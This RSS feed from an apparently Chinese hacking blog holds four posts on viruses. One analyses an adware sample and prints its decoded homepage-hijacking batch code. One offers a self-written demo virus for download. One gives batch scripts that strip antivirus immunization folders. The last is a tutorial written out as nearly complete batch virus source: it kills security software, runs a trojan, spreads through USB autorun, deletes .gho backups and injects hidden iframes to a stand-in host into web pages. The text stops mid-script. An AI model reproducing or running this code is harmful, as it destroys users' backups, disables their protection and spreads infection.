<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>开心技术乐园 &#187; 病毒</title>
	<atom:link href="http://www.hack520.org/tag/%e7%97%85%e6%af%92/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hack520.org</link>
	<description>原创技术乐园</description>
	<lastBuildDate>Tue, 20 Dec 2011 03:29:13 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>『原创』刚刚下载了一颗小病毒(fwwz.net&#124;wx00.com)，跟我一起来“解剖”吧！</title>
		<link>http://www.hack520.org/www-fwwz-net-wx00-com</link>
		<comments>http://www.hack520.org/www-fwwz-net-wx00-com#comments</comments>
		<pubDate>Fri, 29 Jan 2010 08:04:37 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[黑客地带]]></category>
		<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://www.hack520.org/www-fwwz-net-wx00-com</guid>
		<description><![CDATA[刚刚QQ右下角弹出一个QQ邮箱的小纸条，标题为：20美女大学生，日夜不停求包养。如下图： 这个肯定有猫腻！点进去看了下，我就知道一定是病毒了。打算把它下载下来玩玩，看我的回复： OK，很快就下载好了，是个RAR的压缩包，解压一下，出来的是一个JPG图标的文件，文件名为“性感的我.scr”。嘿，我倒要看看你有多“性感”！ 这种调虫小技早就过时了！改成exe文件然后用winrar打开，病毒文件都出来了！解压到一个文件夹，好，我们开始慢慢“解剖”。 对了，首先看一下自解压的注释，如下： Path=C:\WINDOWS\system32 SavePath Setup=C:\WINDOWS\system32\1.vbs Silent=1 Overwrite=1 Shortcut=D, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://vod.wx00.com/, &#8220;&#8221;, &#8220;电影院&#8221;, &#8220;电影院&#8221; Shortcut=D, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://www.52520qq.cn/, &#8220;&#8221;, &#8220;我爱我爱你QQ&#8221;, &#8220;我爱我爱你QQ&#8221; Shortcut=s, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://www.52520qq.cn/, &#8220;&#8221;, &#8220;我爱我爱你QQ&#8221;, &#8220;我爱我爱你QQ&#8221; Shortcut=S, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://vod.wx00.com/, &#8220;&#8221;, &#8220;电影院&#8221;, &#8220;电影院&#8221; Shortcut=P, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://vod.wx00.com/, &#8220;&#8221;, &#8220;电影院&#8221;, &#8220;电影院&#8221; Shortcut=D, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://mp3.wx00.com/, [...]]]></description>
			<content:encoded><![CDATA[<p>刚刚QQ右下角弹出一个QQ邮箱的小纸条，标题为：20美女大学生，日夜不停求包养。如下图：</p>
<p><img alt="清除fwwz.net和wx00.com" src="http://img.hack520.org/2010-01/fwwz.png" title="清除fwwz.net和wx00.com" class="alignnone" width="334" height="106" /></p>
<p>这个肯定有猫腻！点进去看了下，我就知道一定是病毒了。打算把它下载下来玩玩，看我的回复：</p>
<p><span id="more-475"></span></p>
<p><img alt="清除fwwz.net和wx00.com" src="http://img.hack520.org/2010-01/fwwz2.png" title="清除fwwz.net和wx00.com" class="alignnone" width="552" height="441" /></p>
<p>OK，很快就下载好了，是个RAR的压缩包，解压一下，出来的是一个JPG图标的文件，文件名为“性感的我.scr”。嘿，我倒要看看你有多“性感”！</p>
<p>这种调虫小技早就过时了！改成exe文件然后用winrar打开，病毒文件都出来了！解压到一个文件夹，好，我们开始慢慢“解剖”。</p>
<p><img alt="清除fwwz.net和wx00.com" src="http://img.hack520.org/2010-01/fwwz3.png" title="清除fwwz.net和wx00.com" class="alignnone" width="400" height="186" /></p>
<p>对了，首先看一下自解压的注释，如下：</p>
<blockquote>Path=C:\WINDOWS\system32<br />
SavePath<br />
Setup=C:\WINDOWS\system32\1.vbs<br />
Silent=1<br />
Overwrite=1<br />
Shortcut=D, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://vod.wx00.com/, &#8220;&#8221;, &#8220;电影院&#8221;, &#8220;电影院&#8221;<br />
Shortcut=D, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://www.52520qq.cn/, &#8220;&#8221;, &#8220;我爱我爱你QQ&#8221;, &#8220;我爱我爱你QQ&#8221;<br />
Shortcut=s, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://www.52520qq.cn/, &#8220;&#8221;, &#8220;我爱我爱你QQ&#8221;, &#8220;我爱我爱你QQ&#8221;<br />
Shortcut=S, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://vod.wx00.com/, &#8220;&#8221;, &#8220;电影院&#8221;, &#8220;电影院&#8221;<br />
Shortcut=P, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://vod.wx00.com/, &#8220;&#8221;, &#8220;电影院&#8221;, &#8220;电影院&#8221;<br />
Shortcut=D, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://mp3.wx00.com/, &#8220;&#8221;, &#8220;音乐大全&#8221;, &#8220;音乐大全&#8221;<br />
Shortcut=S, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://mp3.wx00.com/, &#8220;&#8221;, &#8220;音乐大全&#8221;, &#8220;音乐大全&#8221;<br />
Shortcut=P, &#8220;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; http://BBS.wx00.com/, &#8220;&#8221;, &#8220;互动交流&#8221;, &#8220;互动交流&#8221;</blockquote>
<p>很简单的东西不用我多解释了吧？首先释放到System32，然后运行1.vbs，最后建立恶意的IE快捷方式。好，先打开1.vbs看看里面写了什么：</p>
<blockquote>Set ws = CreateObject(&#8220;Wscript.Shell&#8221;)<br />
ws.run &#8220;run.bat&#8221;,vbhide<br />
ws.run &#8220;comman.bat&#8221;,vbhide<br />
ws.run &#8220;2.jpg&#8221;,vbhide</blockquote>
<p>运行两个批处理和一个图片。我猜这张一定是美女图片了，打开瞧瞧，是不是真的性感（啊呀，发现自己还真有点色……）：</p>
<p><img alt="性感美女" src="http://img.hack520.org/2010-01/sexy-mm.jpg" title="性感美女" class="alignnone" width="384" height="295" /></p>
<p>Oh, my God！Is she sexy？？wo yun……</p>
<p>好了，继续。第一个运行的是run.bat，打开看看，惨不忍睹的一大堆！我不添代码了，直接截个图：</p>
<p><img alt="清除fwwz和wx00.com" src="http://img.hack520.org/2010-01/fwwz4.png" title="清除fwwz和wx00.com" class="alignnone" width="615" height="473" /></p>
<p>乱七八糟的什么东西啊？如果你关注我以前写的技术文章，你就不会问我是什么东西了。bat加密了！！一看就是用编码转换加的密。如果你关注我以前写的技术文章，你也不会问我怎么解密了。解出来就清楚了，解密之后的代码我贴一下：</p>
<blockquote>cls<br />
@reg add &#8220;HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command&#8221; /v &#8220;&#8221; /d &#8220;\&#8221;C:\Program Files\Internet Explorer\IEXPLORE.EXE\&#8221; http://www.fwwz.net/&#8221; /f<br />
@reg add &#8220;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&#8221; /v &#8220;Explorer&#8221; /d &#8220;c:\windows\system32\Explorer.vbs&#8221; /f<br />
@reg add &#8220;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main&#8221; /v &#8220;Default_Page_URL&#8221; /d &#8220;http://www.fwwz.net&#8221; /f<br />
@reg add &#8220;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main&#8221; /v &#8220;Start Page&#8221; /d &#8220;http://www.fwwz.net&#8221; /f<br />
@reg add &#8220;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion&#8221; /v &#8220;RegisteredOrganization&#8221; /d &#8220;www.fwwz.net&#8221; /f<br />
@reg add &#8220;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion&#8221; /v &#8220;RegisteredOwner&#8221; /d &#8220;服务网络&#8221; /f<br />
echo [InternetShortcut] >>&#8221;%USERPROFILE%\桌面\Internet Explorer.url&#8221;<br />
echo URL=&#8221;hao661.com/?6&#8243; >>&#8221;%USERPROFILE%\桌面\Internet Explorer.url&#8221;<br />
echo IconIndex=0 >>&#8221;%USERPROFILE%\桌面\Internet Explorer.url&#8221;<br />
echo IconFile=&#8221;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; >>&#8221;%USERPROFILE%\桌面\Internet Explorer.url&#8221;<br />
start /min IEXPLORE.EXE http://www.52520qq.cn/?w<br />
start /min IEXPLORE.EXE http://bbs.wx00.com.cn/?w<br />
del %0</blockquote>
<p>这段代码在干什么呢？</p>
<p>一、强制把www.fwwz.net设置为主页并添加IE快捷方式hao661.com/?6到桌面；<br />
二、把Explorer.vbs加为启动项；<br />
三、打开www.52520qq.cn和bbs.wx00.com.cn两个网站；<br />
四、删除自己。</p>
<p>再来看一下comman.bat写了什么东西，打开一看和run.bat一样也加了密：</p>
<p><img alt="清除fwwz.net和wx00.com" src="http://img.hack520.org/2010-01/fwwz5.png" title="清除fwwz.net和wx00.com" class="alignnone" width="615" height="473" /></p>
<p>解密之后：</p>
<blockquote>cls<br />
@reg add &#8220;HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command&#8221; /v &#8220;&#8221; /d &#8220;\&#8221;C:\Program Files\Internet Explorer\IEXPLORE.EXE\&#8221; http://www.fwwz.net/&#8221; /f<br />
echo [InternetShortcut] >>&#8221;%USERPROFILE%\桌面\Internet Explorer.url&#8221;<br />
echo URL=&#8221;hao661.com/?6&#8243; >>&#8221;%USERPROFILE%\桌面\Internet Explorer.url&#8221;<br />
echo IconIndex=0 >>&#8221;%USERPROFILE%\桌面\Internet Explorer.url&#8221;<br />
echo IconFile=&#8221;C:\Program Files\Internet Explorer\IEXPLORE.EXE&#8221; >>&#8221;%USERPROFILE%\桌面\Internet Explorer.url&#8221;<br />
ECHO 处于关闭状态。</blockquote>
<p>和上面一样的东西嘛！真不知道作者在搞什么。</p>
<p>只剩下一个Explorer.vbs了，打开一看，唉…太让我失望了。。<br />
Set ws = CreateObject(&#8220;Wscript.Shell&#8221;)<br />
ws.run &#8220;comman.bat&#8221;,vbhide </p>
<p>一点都不好玩！！！</p>
<p>最后我们愚弄他一下吧！</p>
<p><a href="http://img.hack520.org/2010-01/fwwz6.png"><img alt="清除fwwz.net和wx00.com" src="http://img.hack520.org/2010-01/fwwz6.png" title="清除fwwz.net和wx00.com" class="alignnone" width="650" height="549" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/www-fwwz-net-wx00-com/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>我花一天时间写的病毒，大家可以玩一下~</title>
		<link>http://www.hack520.org/my-virus</link>
		<comments>http://www.hack520.org/my-virus#comments</comments>
		<pubDate>Tue, 02 Jun 2009 19:12:04 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[系统安全]]></category>
		<category><![CDATA[黑客地带]]></category>
		<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://www.hack520.org/%e6%88%91%e8%8a%b1%e4%b8%80%e5%a4%a9%e6%97%b6%e9%97%b4%e5%86%99%e7%9a%84%e7%97%85%e6%af%92%ef%bc%8c%e5%a4%a7%e5%ae%b6%e5%8f%af%e4%bb%a5%e7%8e%a9%e4%b8%80%e4%b8%8b</guid>
		<description><![CDATA[　　这个病毒是为了自己毕业设计时在讲台上演示而写的。因为我的毕业设计就是Nohacker V1.0—系统安全扫描及修复，所以我觉得有必要写个小小的病毒作为演示，然后用我写的安全软件进行检测并删除。因为只是做演示，所以我写的这个病毒虽然具备目前大部分病毒的特征，但并没有破坏性。 　　简单讲讲这个病毒的一些特征。 　　一、病毒运行后会释放出两个病毒体，如下图的“我是病毒”和“我是木马”。 　　这两个病毒体会相互进程守护，就是说关闭任何一个病毒程序，这个病毒程序又会立即重新运行。 　　二、加入启动项在系统启动时自动加载。如果删除启动项会立即自动添加。 　　三、会进行HOSTS域名劫持。 　　四、会进行映像劫持，比如把进程管理器程序劫持为病毒程序本身。如果被修复会立即再次自动劫持。 　　五、会在每个盘符下写入AutoRun.inf使得每次双击硬盘都会运行病毒程序。如果被删除会立即再次自动写入。 　　六、具有U盘传播功能。 　　由于只是作演示，我就这样简单写了几个功能。测试的时候最好把病毒程序放在C盘根目录下。此病毒是为我的NoHacker作演示而写，所以运行之后可以下载我的Nohacker V1.0进行完全清除，请放心测试，嘿嘿～～ 　　测试病毒下载： 　　点击下载我的病毒]]></description>
			<content:encoded><![CDATA[<p>　　这个病毒是为了自己毕业设计时在讲台上演示而写的。因为我的毕业设计就是Nohacker V1.0—系统安全扫描及修复，所以我觉得有必要写个小小的病毒作为演示，然后用我写的安全软件进行检测并删除。因为只是做演示，所以我写的这个病毒虽然具备目前大部分病毒的特征，但并没有破坏性。</p>
<p>　　简单讲讲这个病毒的一些特征。</p>
<p>　　一、病毒运行后会释放出两个病毒体，如下图的“我是病毒”和“我是木马”。</p>
<p><img alt="我写的病毒" src="http://img.hack520.org/attachments/month_0906/m200962185641.png" title="我写的病毒" class="aligncenter" width="561" height="366" /></p>
<p><span id="more-408"></span></p>
<p>　　这两个病毒体会相互进程守护，就是说关闭任何一个病毒程序，这个病毒程序又会立即重新运行。</p>
<p>　　二、加入启动项在系统启动时自动加载。如果删除启动项会立即自动添加。</p>
<p>　　三、会进行HOSTS域名劫持。</p>
<p>　　四、会进行映像劫持，比如把进程管理器程序劫持为病毒程序本身。如果被修复会立即再次自动劫持。</p>
<p>　　五、会在每个盘符下写入AutoRun.inf使得每次双击硬盘都会运行病毒程序。如果被删除会立即再次自动写入。</p>
<p>　　六、具有U盘传播功能。</p>
<p>　　由于只是作演示，我就这样简单写了几个功能。测试的时候最好把病毒程序放在C盘根目录下。此病毒是为我的<strong>NoHacker</strong>作演示而写，所以运行之后可以下载我的<a href="http://www.hack520.org/nohacker10" target="_blank">Nohacker V1.0</a>进行完全清除，请放心测试，嘿嘿～～</p>
<p>　　测试病毒下载：</p>
<p>　　<a href="http://img.hack520.org/attachments/month_0906/2200962191536.rar" target="_blank">点击下载我的病毒</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/my-virus/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>揭秘！看看这些杀毒软件的病毒免疫程序是如何免疫病毒的</title>
		<link>http://www.hack520.org/360-jiangmin-mianmi-bingdu</link>
		<comments>http://www.hack520.org/360-jiangmin-mianmi-bingdu#comments</comments>
		<pubDate>Fri, 16 May 2008 09:49:13 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[系统安全]]></category>
		<category><![CDATA[杀毒软件]]></category>
		<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://www.hack520.org/%e7%9c%8b%e7%9c%8b%e8%bf%99%e4%ba%9b%e9%98%b2%e6%af%92%e8%bd%af%e4%bb%b6%e5%92%8c%e6%9d%80%e6%af%92%e8%bd%af%e4%bb%b6%e7%9a%84%e7%97%85%e6%af%92%e5%85%8d%e7%96%ab%e7%a8%8b%e5%ba%8f%e6%98%af%e5%a6%82</guid>
		<description><![CDATA[　　对于磁碟机病毒，一些人认为打了正版杀软的病毒免疫就可以高枕无忧了，360、江民、瑞星等杀软纷纷出了磁碟机病毒病毒免疫程序，请不要太相信杀软的病毒免疫,360、江民社区等磁碟机病毒免疫程序一个批处理就能干掉!如果病毒制作者将批处理应用于病毒，所有病毒免疫将失去意义，只是一时救急而已。 　　病毒免疫程序的免疫原理：比如说autorun.inf文件，大家再熟悉不过了，但是不管给autorun.inf设置了什么属性，病毒都会更改它。一般的方法就是，在根目录下建立一个文件夹，名字就叫autorun.inf。这样一来，因为在同一目录下，同名的文件和文件夹不能共存的原理，在autorun.inf文件夹里面创建一个带.的文件夹（比如说：360safe.），使得病毒无法删除autorun.inf文件夹，病毒就无能为力，创建不了autorun.inf文件了。以后就算中毒，病毒也不会运行，从而达到了防止中毒的目的。 　　360就是这样进行病毒免疫的，比如对机器狗的免疫，它用下面的方法： 一、在C:windowssystem32drivers 建立pcibus.sys、usb32k.sys等文件夹（当然不止这两个文件夹，在此不一一列举）； 二、在pcibus.sys、 usb32k.sys等文件夹中建立360safe.文件夹； 　　这样一来，当我们打开、删除或重命名360safe.文件夹，会出现： 　　那么，360是怎么样在pcibus.sys、usb32k.sys等文件夹建立360safe.文件夹的呢？其实只不过是用了DOS的md命令。命令如下： md C:\windows\system32\drivers\pcibus.sys md C:\windows\system32\drivers\pcibus.sys\360safe..\ md C:\windows\system32\drivers\usb32k.sys md C:\windows\system32\drivers\usb32k.sys\360safe..\ 　　那怎么样去除pcibus.sys、 usb32k.sys等文件夹及文件夹下360safe.文件夹呢？同样用DOS的rd命令。命令如下： rd /s /q C:\windows\system32\drivers\pcibus.sys\360safe..\ rd /s /q C:\windows\system32\drivers\pcibus.sys rd /s /q C:\windows\system32\drivers\usb32k.sys\360safe..\ rd /s /q C:\windows\system32\drivers\usb32k.sys 　　目前这种方法被很多杀软所用，我曾经也用此方法制作过AUTO免疫工具。但这样简单的方法谁都会，病毒制作者们更不例外，病毒制作者将rd命令的批处理应用于病毒，免疫了又有啥用？！ =============================================================================== 　　江民社区病毒免疫程序和360的免疫的方法有所不同，比如说江民社区磁碟机病毒免疫程序，它用了cacls.exe命令，并设置了权限，免疫批处理如下： cacls.exe C:\NetApi000.sys /t /e /c /d Everyone cacls.exe %windir%\system32\dnsq.dll /t /e /c /d Everyone cacls.exe %windir%\system32\com\netcfg.dll /t [...]]]></description>
			<content:encoded><![CDATA[<p>　　对于磁碟机病毒，一些人认为打了正版杀软的病毒免疫就可以高枕无忧了，360、江民、瑞星等杀软纷纷出了磁碟机病毒病毒免疫程序，请不要太相信杀软的病毒免疫,360、江民社区等磁碟机病毒免疫程序一个批处理就能干掉!如果病毒制作者将批处理应用于病毒，所有病毒免疫将失去意义，只是一时救急而已。</p>
<p>　　病毒免疫程序的免疫原理：比如说autorun.inf文件，大家再熟悉不过了，但是不管给autorun.inf设置了什么属性，病毒都会更改它。一般的方法就是，在根目录下建立一个文件夹，名字就叫autorun.inf。这样一来，因为在同一目录下，同名的文件和文件夹不能共存的原理，在autorun.inf文件夹里面创建一个带.的文件夹（比如说：360safe.），使得病毒无法删除autorun.inf文件夹，病毒就无能为力，创建不了autorun.inf文件了。以后就算中毒，病毒也不会运行，从而达到了防止中毒的目的。</p>
<p><span id="more-326"></span></p>
<p>　　360就是这样进行病毒免疫的，比如对机器狗的免疫，它用下面的方法：</p>
<p>一、在C:windowssystem32drivers 建立pcibus.sys、usb32k.sys等文件夹（当然不止这两个文件夹，在此不一一列举）；</p>
<p>二、在pcibus.sys、 usb32k.sys等文件夹中建立360safe.文件夹；</p>
<p>　　这样一来，当我们打开、删除或重命名360safe.文件夹，会出现：</p>
<p><img alt="病毒免疫程序" src="http://img.hack520.org/attachments/month_0805/l200851694634.gif" title="病毒免疫" class="aligncenter" width="559" height="480" /></p>
<p>　　那么，360是怎么样在pcibus.sys、usb32k.sys等文件夹建立360safe.文件夹的呢？其实只不过是用了DOS的md命令。命令如下：</p>
<pre>md C:\windows\system32\drivers\pcibus.sys
md C:\windows\system32\drivers\pcibus.sys\360safe..\
md C:\windows\system32\drivers\usb32k.sys
md C:\windows\system32\drivers\usb32k.sys\360safe..\
</pre>
<p>　　那怎么样去除pcibus.sys、 usb32k.sys等文件夹及文件夹下360safe.文件夹呢？同样用DOS的rd命令。命令如下：</p>
<pre>rd /s /q C:\windows\system32\drivers\pcibus.sys\360safe..\
rd /s /q C:\windows\system32\drivers\pcibus.sys
rd /s /q C:\windows\system32\drivers\usb32k.sys\360safe..\
rd /s /q C:\windows\system32\drivers\usb32k.sys</pre>
<p>　　目前这种方法被很多杀软所用，我曾经也用此方法制作过AUTO免疫工具。但这样简单的方法谁都会，病毒制作者们更不例外，病毒制作者将rd命令的批处理应用于病毒，免疫了又有啥用？！</p>
<p>===============================================================================</p>
<p>　　江民社区病毒免疫程序和360的免疫的方法有所不同，比如说江民社区磁碟机病毒免疫程序，它用了cacls.exe命令，并设置了权限，免疫批处理如下：</p>
<pre>cacls.exe C:\NetApi000.sys /t /e /c /d Everyone
cacls.exe %windir%\system32\dnsq.dll /t /e /c /d Everyone
cacls.exe %windir%\system32\com\netcfg.dll /t /e /c /d Everyone
cacls.exe %windir%\system32\com\lsass.exe /t /e /c /d Everyone
cacls.exe %windir%\system32\com\smss.exe /t /e /c /d Everyone
cacls.exe %windir%\system32\com\netcfg.000 /t /e /c /d Everyone
FOR %%1 IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO cacls.exe %%1:\autorun.inf /t /e /c /d Everyone
FOR %%2 IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO cacls.exe %%2:\pagefile.pif /t /e /c /d Everyone
cacls.exe %windir%\system32\cacls.exe /t /e /c /d Everyone
Pause
del C:\Anti.bat /q
</pre>
<p>　　上面的批处理做了些什么呢？我们一个个来分析：</p>
<p>　　一、在C盘下生成autorun.inf、NetApi000.sys、pagefile.pif文件夹。<br />
       在所有根符下（比如D:\ 、E:\ ）生成autorun.inf免疫文件夹； </p>
<p>　　二、在C:\windows\system32\dnsq.dll文件夹； </p>
<p>　　三、在C:\windows\system32\com\下生成netcfg.dll、lsass.exe、smss.exe、netcfg.000文件夹； </p>
<p>　　四、所有免疫文件夹下建立com1，并设置了权限。</p>
<p>　　这样删除或重命名com1，会出现“访问被拒绝”。</p>
<p>　　那怎么样去除这些免疫文件夹及文件夹下com1呢？还是用批处理吧！命令如下：</p>
<pre>@echo off
color 17
taskkill /im explorer.exe /f

for /d %%i in (c,d,e,f,g,h,i,j,k,l) do if exist "%%i:/pagefile.pif" (
DEL /F /A /Q \\?\%%i:\pagefile.pif\com1
rd /q/s %%i:\pagefile.pif
)

for /d %%i in (c,d,e,f,g,h,i,j,k,l) do if exist "%%i:/autorun.inf" (
DEL /F /A /Q \\?\%%i:\autorun.inf\com1
rd /q/s %%i:\autorun.inf
)

DEL /F /A /Q \\?\C:\NetApi000.sys\com1
rd /q/s C:\NetApi000.sys
rd \\?\%windir%\system32\dnsq.dll /s /q
rd \\?\%windir%\system32\com\netcfg.dll /s /q
rd \\?\%windir%\system32\com\lsass.exe /s /q
rd \\?\%windir%\system32\com\smss.exe /s /q
rd \\?\%windir%\system32\com\netcfg.000 /s /q
start explorer.exe
exit</pre>
<p>　　当我写了这个批处理，江民社区磁碟机病毒免疫程序将变得毫无意义。</p>
<p>　　病毒制作者远远比我们聪明，他们想尽办法去除免疫文件夹，免疫了又有啥用！只不过是在自己的电脑里多添了几个文件夹而已！</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/360-jiangmin-mianmi-bingdu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>批处理高级应用之编写病毒</title>
		<link>http://www.hack520.org/bat-virus</link>
		<comments>http://www.hack520.org/bat-virus#comments</comments>
		<pubDate>Sat, 14 Apr 2007 13:27:59 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[编程乐园]]></category>
		<category><![CDATA[黑客地带]]></category>
		<category><![CDATA[批处理]]></category>
		<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://www.hack520.org/%e6%89%b9%e5%a4%84%e7%90%86%e9%ab%98%e7%ba%a7%e5%ba%94%e7%94%a8%e4%b9%8b%e7%bc%96%e5%86%99%e7%97%85%e6%af%92</guid>
		<description><![CDATA[@echo off REM 以下批处理内容中止众多安全软件进程 tskill Mcshield.exe &#38; tskill VsTskMgr.exe &#38; tskillnaPrdMgr.exe &#38; tskill UpdaterUI.exe &#38; tskill TBMon.exe &#38; tskill scan32.exe &#38; tskill Ravmond.exe &#38; tskill CCenter.exe &#38; tskill RavTask.exe &#38; tskill Rav.exe &#38; tskill Ravmon.exe &#38; tskill RavmonD.exe &#38; tskill RavStub.exe &#38; taskill KVXP.kxp &#38; tskill kvMonXP.kxp &#38; tskill KVCenter.kxp &#38; tskill KRegEx.exe &#38; tskill [...]]]></description>
			<content:encoded><![CDATA[<p>@echo off<br />
REM 以下批处理内容中止众多安全软件进程<br />
tskill Mcshield.exe &amp; tskill VsTskMgr.exe &amp; tskillnaPrdMgr.exe &amp; tskill UpdaterUI.exe &amp;<br />
tskill TBMon.exe &amp; tskill scan32.exe &amp; tskill Ravmond.exe &amp; tskill CCenter.exe &amp;<br />
tskill RavTask.exe &amp; tskill Rav.exe &amp; tskill Ravmon.exe &amp; tskill RavmonD.exe &amp;<br />
tskill RavStub.exe &amp; taskill KVXP.kxp &amp; tskill kvMonXP.kxp &amp; tskill KVCenter.kxp &amp;<br />
tskill KRegEx.exe &amp; tskill UIHost.exe &amp; tskill TrojDie.kxp &amp; tskill Logo_1.exe &amp;<br />
tskill Rundll32.exe    //tskill是结束进程的命令，&amp;是一个组合命令，顺序执行不管前面是否失败<br />
<span id="more-26"></span><br />
REM 启动木马程序<br />
start /b %systemroot%\system32\muma.com<br />
REM 遍历所有驱动器寻找可移动磁盘<br />
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z)do @fsutil fsinfo drivetype %%i:&gt;&gt;%systemroot%\temp.txt<br />
//Fsutil是可用于执行多种与FAT和NTFS文件系统相关的任务，加上fsinfo是列出所有驱动器的信息。再加上drivetype就是查询一个驱动器的驱动器类型。 %%i 是一个变量，这里分别将c、d、e至z的各个驱动器赋值给这个&amp;&amp;i的变量，然后用fsutil查询出驱动器类型。最后用 &gt;&gt;追加到文件temp.txt<br />
findstr /i &#8220;可移动驱动器&#8221; %systemroot%\temp.txt <br />
//find是查询字符串的一个命令，/i参数表示不区分大小写<br />
if errorlevel==1 goto next<br />
//if errorlevel==1 表示如果出错则执行的命令，goto是跳转语句，会跳转到以:next为行号的地方继续。这里如果出错就表示上面for循环的执行结果没发现一个带有“可移动驱动器”的盘符<br />
if errorlevel==0 goto cop<br />
:cop<br />
for /f &#8220;tokens=1&#8243; %%i in (&#8216;findstr /i &#8220;可移动驱动器&#8221; %systemroot%\temp.txt&#8217;) do @set yidong=%%i<br />
//tokens＝1 把for分作一列。单引号表示是in里面的语句，不能省略。do后面是要执行的语句，set是赋值语句，将变量%%i赋值为环境变量yidong。</p>
<p>REM 向可移动硬盘内复制病毒<br />
copy bat.exe %yidong%\ /y<br />
//注意yidong由于已经是一个环境变量以后应用需要用成对的%%括起来。 /y 参数表示不提示确认。<br />
copy muma.com %yidong%\ /y<br />
attrib +s +h %yidong%\muma.com<br />
attrib +s +h %yidong%\bat.exe<br />
if exist %yidong%\autorun.inf (<br />
attrib -a -s -h %yidong%\autorun.inf<br />
del %yidong%\autorun.inf)<br />
//如果存在autorun.inf则执行括号里面的内容。<br />
echo [AutoRun]&gt;%yidong%\Autorun.inf<br />
echo shell\Open\command=bat.exe&gt;&gt;%yidong%\Autorun.inf<br />
echo shell\Open=打开(^&amp;O)<br />
echo shell\explore=资源管理器(^&amp;X)&gt;&gt;%yidong%\Autorun.inf<br />
//^符号是转义字符，表示后面的&amp;符号失去连接意义。这里加&amp;是加粗显示的用途。<br />
echo shell\explorer\command=bat.exe&gt;&gt;%yidong%\Autorun.inf<br />
attrib +s +h %yidong%\Autorun.inf<br />
del %systemroot%temp.txt /q /f<br />
//删除用于存放临时信息的文件<br />
:next<br />
REM 循环遍历磁盘，自动删除*.gho文件<br />
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (<br />
if exist %%a:\nul(<br />
for /f &#8220;tokens=*&#8221; %%b in (&#8216;dir /s/b/a-d %%a:\*.gho&#8217;) do del &#8220;%%b&#8221; /q /f<br />
))<br />
//这里是对各个磁盘的gho文件进行查找，一旦发现即删除</p>
<p>REM 循环遍历磁盘，自动对ASP，ASPX插入网页木马代码<br />
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (<br />
if exist %%a:\nul(<br />
for /f &#8220;tokens=*&#8221; %%b in (&#8216;dir /s/b/a-d %%a:\*.asp&#8217;) do (echo ^&lt;iframe src=&#8221;<a href="http://www.xxx.com">http://www.xxx.com</a>&#8221; width=0 height=0 border=0^&gt;^&lt;/iframe^&gt;&gt;&gt; &#8220;%%b&#8221;)<br />
))<br />
REM 循环遍历磁盘，自动对HTM，HTML插入网页木马代码<br />
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (<br />
if exist %%a:\nul (<br />
for /f &#8220;tokens=*&#8221; %%b in (&#8216;dir /s/b/a-d %%a:\*.htm&#8217;) do (echo ^&lt;iframe src=&#8221;<a href="http://www.xxx.com">http://www.xxx.com</a>&#8221; width=0 height=0 border=0^&gt;^&lt;/iframe^&gt;&gt;&gt; &#8220;%%b&#8221;)<br />
))<br />
REM 修改注册表不显示隐藏文件<br />
